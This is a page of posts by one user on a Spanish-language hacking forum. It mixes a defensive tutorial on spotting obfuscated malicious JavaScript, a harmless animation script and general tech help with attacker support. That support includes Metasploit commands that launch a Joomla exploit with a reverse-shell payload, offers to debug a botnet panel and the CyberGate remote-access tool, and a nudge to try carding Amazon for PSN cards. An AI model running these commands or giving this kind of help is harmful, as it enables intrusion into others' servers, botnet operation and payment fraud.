Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - blackdrake

Páginas 1 ... 94 95 96 97

#1901

Seguridad web y en servidores / Destripando una web y descubriendo malware! [Tutorial]

Julio 20, 2013, 06:52:22 PM

Hoy en día, hay muchas webs que están infectadas por malwares estos atacan solo a unos cuantos navegadores vulnerables, en este tutorial vamos a aprender a reconocer una web infectada.

Lo primero que necesitamos es una web, pero recordar, tenemos sospechas de que está infectada por lo que no vamos a acceder a ella, directamente bajaremos su código fuente:

NOTA: He borrado la dirección de la web infectada por motivos de seguridad.

Código: text

wget www.sitioweb.com

Una vez tenemos el código fuente de la web, vamos a probar cambiando el user-agent

Podemos obtener una lista desde aqui: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Elegimos un user-agent, yo escogí este:

Código: text

Mozilla/5.0 (Windows NT 6.2; Win64; x64;) Gecko/20100101 Firefox/20.0

Ahora volvemos a hacer lo mismo pero añadiendo este parámetro:

Código: text

wget www.sitioweb.com --user-agent "Mozilla/5.0 (Windows NT 6.2; Win64; x64;) Gecko/20100101 Firefox/20.0"

Comparamos los diferentes archivos en busca de diferencias:

Observamos que el archivo con diferente user-agent tiene javascript ofuscado... vamos a desofuscar ese javascript para saber que contiene!

Para hacer rápido el tutorial y para que lo puedan hacer los más iniciados en este tema, recomiendo subir el javascript a esta web: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Como vemos, ahí está el verdadero javascript, para evitar entrar a la web, analizaremos la url...

Bueno, después de este analisis, llegamos a la conclusión de que la web está infectada, podríamos analizar a fondo la dirección que nos sale del código, pero en este caso no es necesario porque tenemos la seguridad de que se trata de un malware.

Un saludo.

#1902

Diseño UX/UI / Re:Pide tu firma Underc0de!

Julio 20, 2013, 11:03:39 AM

Si aún está activo me gustaría la mía

Gracias y un saludo.

#1903

Zona Webmaster / [JavaScript][BASICO] Efecto Matrix

Julio 20, 2013, 08:29:52 AM

Aquí les dejo el código que simula matrix, muy bueno para titulos o incorporarlo a algún banner:

Código: javascript

<style type="text/css">
.matrix { font-family:Lucida Console, Courier, Monotype; font-size:10pt; text-align:center; width:10px; padding:0px; margin:0px;}
</style>

<script type="text/javascript" language="JavaScript">

<!--
var rows=11; // must be an odd number
var speed=50; // lower is faster
var reveal=2; // between 0 and 2 only. The higher, the faster the word appears
var effectalign="default" //enter "center" to center it.
var w3c=document.getElementById && !window.opera;;
var ie45=document.all && !window.opera;
var ma_tab, matemp, ma_bod, ma_row, x, y, columns, ma_txt, ma_cho;
var m_coch=new Array();
var m_copo=new Array();
window.onload=function() {
	if (!w3c && !ie45) return
  var matrix=(w3c)?document.getElementById("matrix"):document.all["matrix"];
  ma_txt=(w3c)?matrix.firstChild.nodeValue:matrix.innerHTML;
  ma_txt=" "+ma_txt+" ";
  columns=ma_txt.length;
  if (w3c) {
    while (matrix.childNodes.length) matrix.removeChild(matrix.childNodes[0]);
    ma_tab=document.createElement("table");
    ma_tab.setAttribute("border", 0);
    ma_tab.setAttribute("align", effectalign);
    ma_tab.style.backgroundColor="#000000";
    ma_bod=document.createElement("tbody");
    for (x=0; x<rows; x++) {
      ma_row=document.createElement("tr");
      for (y=0; y<columns; y++) {
        matemp=document.createElement("td");
        matemp.setAttribute("id", "Mx"+x+"y"+y);
        matemp.className="matrix";
        matemp.appendChild(document.createTextNode(String.fromCharCode(160)));
        ma_row.appendChild(matemp);
      }
      ma_bod.appendChild(ma_row);
    }
    ma_tab.appendChild(ma_bod);
    matrix.appendChild(ma_tab);
  } else {
    ma_tab='<ta'+'ble align="'+effectalign+'" border="0" style="background-color:#000000">';
    for (var x=0; x<rows; x++) {
      ma_tab+='<t'+'r>';
      for (var y=0; y<columns; y++) {
        ma_tab+='<t'+'d class="matrix" id="Mx'+x+'y'+y+'"> </'+'td>';
      }
      ma_tab+='</'+'tr>';
    }
    ma_tab+='</'+'table>';
    matrix.innerHTML=ma_tab;
  }
  ma_cho=ma_txt;
  for (x=0; x<columns; x++) {
    ma_cho+=String.fromCharCode(32+Math.floor(Math.random()*94));
    m_copo[x]=0;
  }
  ma_bod=setInterval("mytricks()", speed);
}

function mytricks() {
  x=0;
  for (y=0; y<columns; y++) {
    x=x+(m_copo[y]==100);
    ma_row=m_copo[y]%100;
    if (ma_row && m_copo[y]<100) {
      if (ma_row<rows+1) {
        if (w3c) {
          matemp=document.getElementById("Mx"+(ma_row-1)+"y"+y);
          matemp.firstChild.nodeValue=m_coch[y];
        }
        else {
          matemp=document.all["Mx"+(ma_row-1)+"y"+y];
          matemp.innerHTML=m_coch[y];
        }
        matemp.style.color="#33ff66";
        matemp.style.fontWeight="bold";
      }
      if (ma_row>1 && ma_row<rows+2) {
        matemp=(w3c)?document.getElementById("Mx"+(ma_row-2)+"y"+y):document.all["Mx"+(ma_row-2)+"y"+y];
        matemp.style.fontWeight="normal";
        matemp.style.color="#00ff00";
      }
      if (ma_row>2) {
          matemp=(w3c)?document.getElementById("Mx"+(ma_row-3)+"y"+y):document.all["Mx"+(ma_row-3)+"y"+y];
        matemp.style.color="#009900";
      }
      if (ma_row<Math.floor(rows/2)+1) m_copo[y]++;
      else if (ma_row==Math.floor(rows/2)+1 && m_coch[y]==ma_txt.charAt(y)) zoomer(y);
      else if (ma_row<rows+2) m_copo[y]++;
      else if (m_copo[y]<100) m_copo[y]=0;
    }
    else if (Math.random()>0.9 && m_copo[y]<100) {
      m_coch[y]=ma_cho.charAt(Math.floor(Math.random()*ma_cho.length));
      m_copo[y]++;
    }
  }
  if (x==columns) clearInterval(ma_bod);
}

function zoomer(ycol) {
  var mtmp, mtem, ytmp;
  if (m_copo[ycol]==Math.floor(rows/2)+1) {
    for (ytmp=0; ytmp<rows; ytmp++) {
      if (w3c) {
        mtmp=document.getElementById("Mx"+ytmp+"y"+ycol);
        mtmp.firstChild.nodeValue=m_coch[ycol];
      }
      else {
        mtmp=document.all["Mx"+ytmp+"y"+ycol];
        mtmp.innerHTML=m_coch[ycol];
      }
      mtmp.style.color="#33ff66";
      mtmp.style.fontWeight="bold";
    }
    if (Math.random()<reveal) {
      mtmp=ma_cho.indexOf(ma_txt.charAt(ycol));
      ma_cho=ma_cho.substring(0, mtmp)+ma_cho.substring(mtmp+1, ma_cho.length);
    }
    if (Math.random()<reveal-1) ma_cho=ma_cho.substring(0, ma_cho.length-1);
    m_copo[ycol]+=199;
    setTimeout("zoomer("+ycol+")", speed);
  }
  else if (m_copo[ycol]>200) {
    if (w3c) {
      mtmp=document.getElementById("Mx"+(m_copo[ycol]-201)+"y"+ycol);
      mtem=document.getElementById("Mx"+(200+rows-m_copo[ycol]--)+"y"+ycol);
    }
    else {
      mtmp=document.all["Mx"+(m_copo[ycol]-201)+"y"+ycol];
      mtem=document.all["Mx"+(200+rows-m_copo[ycol]--)+"y"+ycol];
    }
    mtmp.style.fontWeight="normal";
    mtem.style.fontWeight="normal";
    setTimeout("zoomer("+ycol+")", speed);
  }
  else if (m_copo[ycol]==200) m_copo[ycol]=100+Math.floor(rows/2);
  if (m_copo[ycol]>100 && m_copo[ycol]<200) {
    if (w3c) {
      mtmp=document.getElementById("Mx"+(m_copo[ycol]-101)+"y"+ycol);
      mtmp.firstChild.nodeValue=String.fromCharCode(160);
      mtem=document.getElementById("Mx"+(100+rows-m_copo[ycol]--)+"y"+ycol);
      mtem.firstChild.nodeValue=String.fromCharCode(160);
    }
    else {
      mtmp=document.all["Mx"+(m_copo[ycol]-101)+"y"+ycol];
      mtmp.innerHTML=String.fromCharCode(160);
      mtem=document.all["Mx"+(100+rows-m_copo[ycol]--)+"y"+ycol];
      mtem.innerHTML=String.fromCharCode(160);
    }
    setTimeout("zoomer("+ycol+")", speed);
  }
}
// -->
</script>
<div id="matrix">Blackdrake</div>

Solo hay que editar el texto que dice Blackdrake por el que quieran.

Un saludo

#1904

Zona Webmaster / Re:[JavaScript] Detectando Errores

Julio 20, 2013, 08:03:20 AM

Muy bueno arthusu muchas gracias por el aporte

#1905

Off Topic / Re:Underc0de te desea un muy feliz dia del amigo!

Julio 20, 2013, 07:16:58 AM

Feliz dia a todos y ojala que la comunidad siga asi

#1906

Dudas y pedidos generales / Re:Tengo dudas para elegir un programas que llevan el control.

Julio 18, 2013, 07:12:07 AM

Busca un programador y que te lo haga xD

No creo que nadie te pueda ayudar, buscas un software muy enfocado a tu negocio...

Un saludo.

#1907

Dudas y pedidos generales / Re:Comandos :S

Julio 18, 2013, 07:08:35 AM

En mac no necesitas usar apt-get install o aptitude ni nada así xD

Te dejo una lista de comandos por si quieres echarle un vistazo: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Un saludo

#1908

Dudas y pedidos generales / Re:Ayuda con exploit para Joomla

Julio 18, 2013, 07:03:36 AM

Mmmm podrías decirme el nombre del exploit? es este?

Código: text


msf > use exploit/unix/webapp/joomla_tinybrowser
msf exploit(joomla_tinybrowser) > show payloads
msf exploit(joomla_tinybrowser) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(joomla_tinybrowser) > set LHOST MIIP
msf exploit(joomla_tinybrowser) > set RHOST OBJETIVO
msf exploit(joomla_tinybrowser) > exploit

Pones todos los datos correctamente?

Puedes ver el código desde aquí y así ves donde te salta el error: No tienes permitido ver enlaces. Registrate o Entra a tu cuenta

Un saludo.

#1909

Dudas y pedidos generales / Re:Error al instalar Office 2013

Julio 16, 2013, 04:05:11 PM

Has probado a ejecutarlo como administración o a cambiar lo de ejecutar como otra versión de windows?

Un saludo.

#1910

Dudas y pedidos generales / Re:Programacion

Julio 16, 2013, 04:03:40 PM

Podrías especificar mas, que lenguaje quieres aprender?

Aunque como dice @Underc0der, centrate en lo básico y desde ahí empieza a estudiarlo más a fondo.

Pasate por aquí No tienes permitido ver enlaces. Registrate o Entra a tu cuenta alomejor te sirve

Un saludo

#1911

Dudas y pedidos generales / Re:Cheat Engine Windows 8 64bits

Julio 16, 2013, 04:00:20 PM

Descarga la nueva versión en la página oficial pone que se han solucionado algunos errores para el sistema que utilizas

Un saludo.

#1912

Dudas y pedidos generales / Re:BOTNET RAVEN ERROR!

Julio 16, 2013, 03:57:48 PM

No la he probado, asique no se como es, pero has ingresado correctamente todos los campos? has revisado que el resto de las cosas funcionen? puede ser que el hosting haya quitado alguna función y por eso se produce el error.

Subelo a otro host, lo pruebas y si te sigue dando el mismo error, me avisas, lo descargo lo testeo y te digo

Un saludo.

#1913

Dudas y pedidos generales / Re:conseguir psn card (ps3) gratis?

Julio 16, 2013, 03:55:50 PM

A ver, los generadores, básicamente no funcionan (cuando vea alguno que lo haga, diré lo contrario xD)

En cuanto a lo de amazon.. pues... nunca se sabe, la seguridad la cambian muchisimo y puede que ayer fuese aun cardeable pero hoy ya no, ves y pruebalo tu mismo y nos cuentas xD

Metodo más fácil? ves a la tienda y la compras.

Un saludo.

#1914

Dudas y pedidos generales / Re:multitouch

Julio 16, 2013, 03:53:41 PM

Mmmm has probado a instalar los drivers?

#1915

Dudas y pedidos generales / Re:SQLmap POST

Julio 16, 2013, 03:50:49 PM

Es simple, si no explota sql es que hay algo mal xDD

Un saludo.

#1916

Bugs y Exploits / Re:XSS y reparacion

Julio 16, 2013, 03:45:35 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Por que me tira Bad Request, Algo estoy haciendo mal? lo eh intentado en varios casos y siempre sale esto.

Pon tu código y te lo soluciono, tendrás un error de sintaxis, si no quieres hacerlo público envíamelo por MP

Un saludo.

#1917

Off Topic / Re:te interesaria una intro para tus videos?

Julio 16, 2013, 03:39:13 PM

Yo también quiero una!! te envio un MP de como me gustaría

Gracias y un saludo.

#1918

Dudas y pedidos generales / Re:[Ayuda]Mandar email el dia de cumpleaños

Julio 16, 2013, 09:11:11 AM

Mmmmm que se envíe automáticamente pues... no se como hacerlo la verdad pero este código te podría servir:

Código: php


<?php
// varios receptores
$para  = '[email protected]' . ', ';
$para .= '[email protected]';

// asunto
$asunto = 'Cumpleaños';

// Mensaje
$mensaje = '
<html>
<head>
  <title>Cumpleaños</title>
</head>
<body>
  <p>Felicidades!</p>
</body>
</html>
';

// Cabeceras del correo
$headers  = 'MIME-Version: 1.0' . "\r\n";
$headers .= 'Content-type: text/html; charset=iso-8859-1' . "\r\n";

// Cabeceras adicionales
$headers .= 'To: Prueba <[email protected]>, Test <[email protected]>' . "\r\n";
$headers .= 'From: Cumpleaños <[email protected]>' . "\r\n";
$headers .= 'Cc: archivodecumpleañ[email protected]' . "\r\n";

// Enviar
mail($para, $asunto, $mensaje, $headers);
?>

Optimiza el código para que saque los campos de la DB que cumplan años ese día y ya...

Ahora mismo no se me ocurre nada mas.. :S

Un saludo.

#1919

Off Topic / Re:(No apto para fracasados)

Julio 15, 2013, 02:31:02 PM

No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
Lástima que no pueda verlo porque soy un fracasado

@11Sep y @Karcrack Dudo que eso sea así...

Sobre el vídeo.... Increíble

#1920

Dudas y pedidos generales / Re:una cosa rara con cybergate

Julio 15, 2013, 02:23:35 PM

Prueba en una virtual, si no te pasa es problema del windows que tienes ahora mismo instalado (registro, virus etc....) si te sigue pasando pues piensa que puede ser problema del software.

Un saludo

Páginas 1 ... 94 95 96 97